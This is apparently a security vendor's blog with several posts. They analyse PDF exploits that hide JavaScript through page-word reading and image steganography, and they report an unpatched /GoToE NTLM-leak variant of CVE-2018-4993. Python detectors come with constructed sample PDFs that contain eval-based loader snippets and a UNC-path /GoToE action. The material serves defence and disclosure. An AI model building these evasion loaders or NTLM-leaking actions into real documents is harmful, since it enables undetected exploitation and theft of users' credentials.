Tuesday, January 22, 2019

"steganography" - obfuscating PDF exploits in depth

Shortly after last week's discovery of a PDF exploit that used the this.getPageNumWords() & this.getPageNthWord() method for obfuscation, we found another, much more powerful, obfuscation technique in PDF exploits. This technique uses so-called "steganography" to hide malicious JavaScript code in images embedded in the PDF file, and it is powerful enough to bypass almost all AV engines.

The sample was detected as "exploit CVE-2013-3346" by our EdgeLogic engine, the same as the previous one.

The sample was first submitted to VirusTotal on 2017-10-10, with a filename "oral-b oxyjet spec.pdf".

Only one AV engine had detected this exploit as of last week (as of writing, detection has increased to 5/57).

Once opened, the PDF, disguised as an IRS document, looked normal.

Two layers of obfuscation were used in this sample. The first layer is what we disclosed previously: the "this.getPageNumWords()" and "this.getPageNthWord()" method. The exploit uses these two APIs to read and execute JavaScript hidden as page "content". The related code can be found in PDF stream-64.


The second layer is new and is the focus of this post. The "JavaScript content" is stored in stream-119; let's see what it looks like.

After beautifying the JavaScript, it looks as follows:

To figure out what the JavaScript does, we first need to understand two PDF JavaScript APIs: this.getIcon() and util.iconStreamFromIcon(). The following is an extract from Adobe's reference.

According to the API reference, these two APIs, used together, read the stream of an image named "icon" stored in the PDF file.

By examining the JavaScript code above, we determined that its job is to read and decode the "message" hidden in the icon's stream. Once the "message" has been read successfully, it is executed as JavaScript code via "eval(msg)".

The icon stream named "icon" in object-131 can be saved as a "jpg" file and viewed in an image viewer without any problem, as shown below:

The malicious data is hidden in the image while the image is still viewable

Nevertheless, no suspicious data can be spotted inside the icon file, since the malicious code is heavily obfuscated.

What does the finally executed JavaScript look like? Here is a piece of the real code after successful de-obfuscation.

From this code, we confirmed that the exploited vulnerability is CVE-2013-3346.

Furthermore, we deduce that this sample and the previous one are from the same author, for the following reasons.
  1. Both exploit the same vulnerability (CVE-2013-3346).
  2. The JavaScript code in the two exploits is very similar.
After some googling, we found that the attacker likely copied a project/technique called "steganography.js", which is open sourced here. That project was developed for browsers. We believe the person behind the PDF samples innovated by successfully applying the technique to the PDF format. We could not find any earlier mention of such a technique in PDF exploits, so we believe this is the first time "steganography" has been used to hide PDF exploits.

We were impressed by this technique, which is ideal for obfuscating malicious code in PDF exploits. With it, all streams look normal, all images are viewable, and everything looks legitimate. This probably explains why almost all AV engines missed it.

In this post we researched the truly advanced "steganography" technique used for obfuscating PDF exploits. That we are able to beat this obfuscation technique, among many others, demonstrates the power of our EdgeLogic engine.

As with the previous one, the "steganography" technique can be used to obfuscate not only this exploit (CVE-2013-3346) but also many other PDF exploits, including zero-days. We ask defenders to pay close attention to it.

Follow us @EdgeSpot_io.

Monday, January 14, 2019

An interesting obfuscation method for PDF exploits (this.getPageNumWords() & this.getPageNthWord())

Recently, our EdgeLogic engine detected a malicious PDF sample, reported as "exploit CVE-2013-3346".

The sample first appeared on VirusTotal on 2017-10-06.

Although this sample has been on VT for more than a year, most AV engines are unable to detect it.

It was therefore brought to our attention when our engine detected it. We analysed the sample manually. The stream of object-1 contains interesting JavaScript.

It uses the PDF JavaScript APIs this.getPageNumWords() and this.getPageNthWord() to "read" the JavaScript contents from the PDF pages, then executes them via eval(box).

We can see that object-6, object-8, and object-10 contain JavaScript, but stored as page "content" that is consumed by object-1.

content of object-6

content of object-8

content of object-10

After some googling, we believe this is an exploit for the PDF vulnerability CVE-2013-3346, about which FireEye published a blog post in December 2013; the exploit was not obfuscated at that time. Because of the obfuscation method, it remains largely undetected by AV engines.

The obfuscation method does not seem new either; it was mentioned in a 2010 blog post from F-Secure. However, as we have seen, it is still quite effective.

When displayed in a non-vulnerable PDF reader, the PDF looks like this.

The above is the first page. The PDF contains 4 pages in total; the other three pages correspond to object-6, object-8, and object-10 respectively. The exploit author rendered the words on these three pages in a very small font, but after zooming to 500% we could confirm that they are the JavaScript strings we found in object-6, object-8, and object-10.
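The two obfuscation layers described in this post and in the steganography post above share one shape: a small loader script that holds no exploit code of its own, pulls the real script out of page text (getPageNumWords/getPageNthWord) or out of an icon stream (getIcon/iconStreamFromIcon), and hands it to eval(). That shape is itself a detection opportunity. The following Python script is an added example, not EdgeSpot's engine and not code from the samples: it extracts every script reachable through a /JS entry of a PDF (inline literal strings and FlateDecode'd stream objects) and reports which loader API family occurs together with eval(). The API names are the real Acrobat JavaScript names quoted in the posts; grouping them into families, the object layout of the constructed sample document, and the script bodies inside it are our own assumptions, and the sample loaders assemble nothing and carry no exploit.

```python
"""Static heuristic for the two PDF JavaScript loader shapes described in the posts above.
A loader carries no exploit itself: it rebuilds the real script at run time from elsewhere
in the document and hands it to eval(). Nothing here executes JavaScript; scripts reachable
through /JS are extracted and checked for co-occurring API names. Added example, not EdgeSpot code."""
from __future__ import annotations

import re
import zlib

# The API names are real Acrobat JavaScript APIs; grouping them into loader families is our heuristic.
LOADER_PATTERNS = {
    "page_words_loader": (b"getPageNumWords", b"getPageNthWord", b"eval("),
    "icon_stego_loader": (b"getIcon", b"iconStreamFromIcon", b"eval("),
}
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")  # /JS pointing at a stream object
JS_LITERAL_RE = re.compile(rb"/JS\s*\(")           # /JS carrying an inline literal string


def _literal_string(body: bytes, start: int) -> bytes:
    """Read the PDF literal string whose '(' sits at body[start]; nested parens are balanced."""
    depth, i, out = 0, start, bytearray()
    while i < len(body):
        c = body[i:i + 1]
        i += 1
        if c == b"\\":  # keep the escaped byte, drop the backslash: enough for keyword matching
            out += body[i:i + 1]
            i += 1
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        if not (c == b"(" and depth == 1):
            out += c
    return bytes(out)


def _stream_data(body: bytes) -> bytes:
    """Decoded payload of one stream object (direct /Length and FlateDecode only)."""
    head = re.search(rb"stream\r?\n", body)
    if not head:
        return b""
    dictionary = body[:head.start()]
    length = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", dictionary)
    if not length:  # indirect /Length is out of scope for this heuristic
        return b""
    data = body[head.end():head.end() + int(length.group(1))]
    if b"/FlateDecode" in dictionary:
        try:
            data = zlib.decompress(data)
        except zlib.error:
            return b""  # damaged or multi-filter stream: skip rather than guess
    return data


def extract_javascript(pdf: bytes) -> list[tuple[int, bytes]]:
    """(object number, script bytes) for every object reachable through a /JS entry."""
    referenced = {int(n) for n in JS_REF_RE.findall(pdf)}
    scripts = []
    for num, _gen, body in OBJ_RE.findall(pdf):
        if int(num) in referenced:
            code = _stream_data(body)
        else:
            m = JS_LITERAL_RE.search(body)
            code = _literal_string(body, m.end() - 1) if m else b""
        if code:
            scripts.append((int(num), code))
    return scripts


def classify_script(code: bytes) -> list[str]:
    """Every loader family whose API names all occur in the script."""
    return [name for name, apis in LOADER_PATTERNS.items() if all(api in code for api in apis)]


def scan_pdf(pdf: bytes) -> dict[int, list[str]]:
    """Object number -> loader families found in its JavaScript (objects with none are omitted)."""
    findings = {}
    for num, code in extract_javascript(pdf):
        hits = classify_script(code)
        if hits:
            findings[num] = hits
    return findings


def sample_pdf() -> bytes:
    """Constructed document: FlateDecode'd page-words loader (obj 2), benign script (obj 4),
    inline icon loader (obj 5). The loaders mirror only the API shape from the posts."""
    page_words = (b'var box = "";\n'
                  b'for (var i = 0; i < this.getPageNumWords(1); i++) box += this.getPageNthWord(1, i);\n'
                  b'eval(box);')
    icon = b'var s = util.iconStreamFromIcon(this.getIcon("icon"));\nvar msg = decode(s);\neval(msg);'
    benign = b'app.alert("Thanks for reading (and zooming in)");'
    packed = zlib.compress(page_words)
    objects = [
        b"1 0 obj\n<< /Type /Catalog /OpenAction << /S /JavaScript /JS 2 0 R >> >>\nendobj",
        b"2 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed) + packed + b"\nendstream\nendobj",
        b"4 0 obj\n<< /S /JavaScript /JS (" + benign + b") >>\nendobj",
        b"5 0 obj\n<< /S /JavaScript /JS (" + icon + b") >>\nendobj",
    ]
    return b"%PDF-1.7\n" + b"\n".join(objects) + b"\n%%EOF\n"
```

scan_pdf(sample_pdf()) returns {2: ['page_words_loader'], 5: ['icon_stego_loader']}; the benign object 4 is extracted but not reported. The script is a triage aid, not a verdict: a hit only says "this script builds code at run time from document content", which is the cue to pull the referenced page text or icon stream and look at it, as the posts do. Object streams, indirect /Length values and filters other than FlateDecode are deliberately out of scope.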

Conclusion

The obfuscation method described in this post may not be new, but it is very effective at bypassing many detection engines. More importantly, we should realize that such an obfuscation method could be used to obfuscate not only this (CVE-2013-3346) exploit but many other PDF exploits, including zero-days. This is another good example demonstrating the power of our EdgeLogic engine: we were able to beat the obfuscation method used in this PDF exploit. So, when you encounter suspicious samples, whether in an email format (eml, msg), Office files (doc, xls, ppt), PDF, or even .zip, try edgespot.io and see what it detects!
Follow us @EdgeSpot_io.

Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing an NTLM leaking vulnerability in Adobe Reader and Foxit Reader. Later, Adobe released a security advisory stating that the vulnerability was fixed as of Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability was successfully patched by Adobe; the other variant was not actually addressed.

The story
Recently, while testing our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples producing interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They look like the following:

[Update on Nov. 14]
Starting today, users of edgespot.io will find that the Detection Details of this particular threat have changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)". This is because today we modified the description of the threat to reflect that a patch is available and a CVE ID has been assigned.

Could it be a false positive? Of course it could. Given that attack techniques are always evolving, exploit detection is not an easy task.

To confirm this result, we fired up our VM, updated it to the latest Adobe Reader version, and tested the two samples manually. We observed that both samples still generated outbound NTLM traffic.

After further research, we confirmed that the two samples exploit the same or a similar vulnerability to CVE-2018-4993, which was discussed in the Check Point blog post mentioned earlier. The Check Point blog stated:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found that the key parts of the two PDFs are:

Both use the "/GoToE" keyword to trigger the NTLM leak. We later confirmed that while the "/GoToR" method was patched by Adobe, the "/GoToE" method was not.

We conclude that this is a failed patch for CVE-2018-4993 rather than a new vulnerability, because the Check Point blog mentioned this variant when disclosing CVE-2018-4993. Note that we do not know whether both variants ("/GoToR" and "/GoToE") were reported to Adobe by Check Point, but clearly one variant was not fixed.
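The distinction made above (an action whose /S is GoToR or GoToE and whose /F file specification names another host) is something a defender can check statically, before any reader opens the file. The following Python check is an added example, not EdgeSpot code and not taken from the samples. It assumes, following the Check Point write-up the post cites, that a leaking sample names a remote UNC share (or a URL) in the /F entry, and it runs on a constructed document that uses documentation-range addresses.

```python
"""Static check for PDF GoTo-remote actions (/GoToR, /GoToE) whose file specification
points off-host, the action shape behind the CVE-2018-4993 samples discussed above.
Added example on constructed input, not EdgeSpot code. Assumption: the leaking samples
name a remote UNC share (or URL) in the /F entry, as in the Check Point write-up cited."""
import re

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", re.DOTALL)
GOTO_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# Innermost /F (literal string); a URL file spec is written /F << /FS /URL /F (http://...) >>
FILE_RE = re.compile(rb"/F\s*\(([^)]*)\)")


def _unescape(s: bytes) -> bytes:
    """Drop the escaping backslash that PDF literal strings put before backslash, '(' and ')'."""
    return re.sub(rb"\\([\\()])", rb"\1", s)


def classify_target(target: bytes) -> str:
    """Where the action would send the reader."""
    if not target:
        return "no_file_spec"  # e.g. a /GoToE target reached via /T rather than /F
    if target.startswith(b"\\\\"):
        return "remote_unc"    # \\host\share\...: an SMB connection, hence the NTLM exchange
    if re.match(rb"(?i)^[a-z][a-z0-9+.-]*://", target):
        return "remote_url"
    return "local"


def scan_goto_actions(pdf: bytes) -> list:
    """One record per object holding a GoToR/GoToE action: decoded target plus verdict."""
    findings = []
    for num, body in OBJ_RE.findall(pdf):
        action = GOTO_RE.search(body)
        if not action:
            continue
        spec = FILE_RE.search(body)
        target = _unescape(spec.group(1)) if spec else b""
        findings.append({"obj": int(num), "action": action.group(1).decode(),
                         "target": target.decode("latin-1"), "verdict": classify_target(target)})
    return findings


def ntlm_leak_candidates(pdf: bytes) -> list:
    """Objects whose GoTo action would make the reader contact another host."""
    return [f["obj"] for f in scan_goto_actions(pdf) if f["verdict"].startswith("remote_")]


# Inside a PDF literal string every backslash is doubled; this decodes to a UNC path on 192.0.2.10
UNC_AS_WRITTEN = rb"\\\\192.0.2.10\\share\\x.pdf"  # constructed, documentation-range address


def sample_pdf() -> bytes:
    """Constructed document: the unpatched /GoToE variant (obj 2), a harmless sibling-file
    GoToR (obj 3), a URL GoToR (obj 4) and a plain /URI action that is not a GoTo (obj 5)."""
    objects = [
        b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj",
        b"2 0 obj\n<< /S /GoToE /F (" + UNC_AS_WRITTEN + b") /D [0 /Fit] >>\nendobj",
        b"3 0 obj\n<< /S /GoToR /F (appendix.pdf) /D [0 /Fit] >>\nendobj",
        b"4 0 obj\n<< /S /GoToR /F << /FS /URL /F (http://192.0.2.10/x.pdf) >> /D [0 /Fit] >>\nendobj",
        b"5 0 obj\n<< /S /URI /URI (http://example.invalid/) >>\nendobj",
    ]
    return b"%PDF-1.7\n" + b"\n".join(objects) + b"\n%%EOF\n"
```

On the constructed document, ntlm_leak_candidates(sample_pdf()) returns [2, 4]: object 2 is the GoToE variant with a UNC target, object 4 a GoToR with a URL file specification, while the sibling-file GoToR is reported as "local" and the /URI action is ignored. The check looks at the action type and target only; it does not distinguish a patched reader from an unpatched one, which is exactly why a GoToE pointing off-host deserved attention even after the advisory for CVE-2018-4993.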

Nevertheless, from the point of view of protecting users, it is a big deal for the following reasons:
  1. This is a zero-day (unpatched) exploit.
  2. The details of the zero-day exploit have been public for more than 5 months.
  3. Regarding the two samples on VT (there are likely more, although we found these two by chance), we do not know why they were submitted to VT or by whom; it is possible that bad guys realized this variant was not patched and were testing their zero-day exploits.
We realized this is an important finding, so we reported it to Adobe as fast as we could, despite our busy schedule developing the system and website for edgespot.io. We are happy that they took the issue seriously and patched it quickly. Here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding & notified us they plan to release a patch on Nov. 13
2018.11.13 patch released & blog post released

We ask users to patch Adobe Reader as soon as possible; please follow Adobe's security advisory released today.

This finding proves the power of the EdgeLogic engine behind https://edgespot.io: it has an outstanding capability for identifying unknown and zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter suspicious samples, whether in an email format (eml, msg), Office files (doc, xls, ppt), PDF, or even .zip, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two, which used internal IP addresses, this one used an external IP address, which looks more like a real in-the-wild attack. We're sharing this info to help the security community with threat intelligence.

Sunday, November 4, 2018

Announcing edgespot.io - a free exploit detection service with cutting-edge techniques!

Today, we're excited to announce the general availability (BETA) of edgespot.io - a free exploit detection service with cutting-edge techniques!

Today's cyber attacks, especially the advanced ones, usually start with an exploit. For instance, "embedded" malware may run as soon as the user opens an email attachment. Attackers may exploit patched vulnerabilities, since not all users patch their software in time. Furthermore, they may exploit zero-day vulnerabilities, leaving the victim with nowhere to go.

Edgespot.io is built specifically to fight those advanced threats. It works like the well-known virustotal.com: you upload a file and it tells you whether the file is malicious. However, there are big differences.
  1. edgespot.io does NOT rely on or use any other malware or exploit detection engine; it is powered by our own (independent) EdgeLogic exploit analysis engine.
  2. edgespot.io does NOT accept "executable" samples (e.g. .exe/.dll); instead, it is built for detecting client-side exploit samples (for now). The most popular sample types we currently deal with are Microsoft Office files (Word, Excel, PowerPoint), PDFs, emails, etc.
After a file is submitted on edgespot.io, it is analyzed by our EdgeLogic system, an innovative exploit analysis system invented and built by us. The system is powered by various cutting-edge technologies such as machine learning and dynamic and static sample analysis, but most importantly, it is built with a sense of exploit research.

The following screenshot shows a sample detected as a CVE-2017-11882 exploit.

Please note that compared to other malware detection services/products, the advantage of edgespot.io is its outstanding capability of detecting unknown or even zero-day exploits! Based on our in-lab tests, the results are very promising.

We hope you love the service; for more details please read our About page here. You can try it right now. :)

Please do not hesitate to reach us via email (contact@edgespot.io), our contact page, or Twitter; you're always welcome. Let's work together and make the internet a safer place.

The EdgeSpot team